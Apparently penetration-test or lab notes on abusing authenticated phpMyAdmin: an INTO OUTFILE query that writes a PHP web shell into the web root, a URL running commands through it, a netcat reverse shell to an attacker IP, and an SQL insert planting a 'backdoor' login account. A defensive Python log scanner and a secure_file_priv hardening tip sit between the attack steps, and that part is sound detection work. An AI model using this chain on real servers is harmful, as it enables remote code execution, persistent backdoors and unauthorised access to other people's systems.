phpMyAdmin
(Authenticated)
[1] Navigate to Server → SQL, add and save this string:
SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/backdoor.php"
[2] Command injection
http://192.168.101.108/backdoor.php?cmd=whoami
[3] Reverse shell
http://192.168.101.108/backdoor.php?cmd=nc 192.168.101.95 4444 -e /bin/bash
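To spot the sequence above on a server you defend, this added example (not part of the original notes) scans a MySQL query log for INTO OUTFILE/DUMPFILE writes under a web root, then finds web requests that hit the written file. The log lines are constructed, and WEB_ROOTS, docroot, the simplified log formats and the query log being enabled are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed web roots to watch; adjust to the server's actual document roots.
WEB_ROOTS = ("/var/www/", "/srv/www/", "/usr/share/nginx/html/")
# SELECT ... INTO OUTFILE|DUMPFILE '<path>', quoted with straight or curly quotes.
OUTFILE_RE = re.compile(
    r"\binto\s+(?:out|dump)file\s+['\"\u201c\u2018]([^'\"\u201d\u2019]+)", re.IGNORECASE)
# Request field of a combined-format access log line, followed by the status code.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S.*?) HTTP/[\d.]+" (\d{3})')


def files_written_to_web_root(query_log_lines):
    """Return paths that logged queries wrote under a watched web root."""
    hits = []
    for line in query_log_lines:
        m = OUTFILE_RE.search(line)
        if m and m.group(1).startswith(WEB_ROOTS):
            hits.append(m.group(1))
    return hits


def requests_to_dropped_files(access_log_lines, dropped_paths, docroot="/var/www/html"):
    """Return (url_path, parameter_names, status) for requests to a dropped file."""
    served = {p[len(docroot):] for p in dropped_paths if p.startswith(docroot)}
    hits = []
    for line in access_log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = urlsplit(m.group(1))
        if target.path in served:
            hits.append((target.path, sorted(parse_qs(target.query)), int(m.group(2))))
    return hits

# Constructed sample log lines (not taken from a real system).
QUERY_LOG = [
    "2024-01-01T10:00:00Z 12 Query SELECT * FROM webappdb.users",
    "2024-01-01T10:01:00Z 12 Query SELECT \"<?php ... ?>\" INTO OUTFILE '/var/www/html/backdoor.php'",
    "2024-01-01T10:02:00Z 12 Query SELECT 1 INTO OUTFILE '/var/lib/mysql-files/report.csv'",
]
ACCESS_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:01:30 +0000] "GET /index.php HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Jan/2024:10:01:40 +0000] "GET /backdoor.php?cmd=whoami HTTP/1.1" 200 9',
]

if __name__ == "__main__":
    dropped = files_written_to_web_root(QUERY_LOG)
    print(dropped, requests_to_dropped_files(ACCESS_LOG, dropped))
```

Setting secure_file_priv to a directory outside the web root, and not granting the FILE privilege to application accounts, blocks the write in step [1].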
# Adding a new user (Authenticated)
Once you have access to the phpMyAdmin console, click on users and find the usernames and passwords.
Add a new user for privilege escalation
Click on SQL tab to inject SQL
insert into webappdb.users(password, username) VALUES ("backdoor","backdoor");
This adds a new user whose username and password are both "backdoor".
select * from webappdb.users
Now that you have created a new user, you can log in with backdoor:backdoor
http://192.168.177.10/login.php (Tom's taco truck)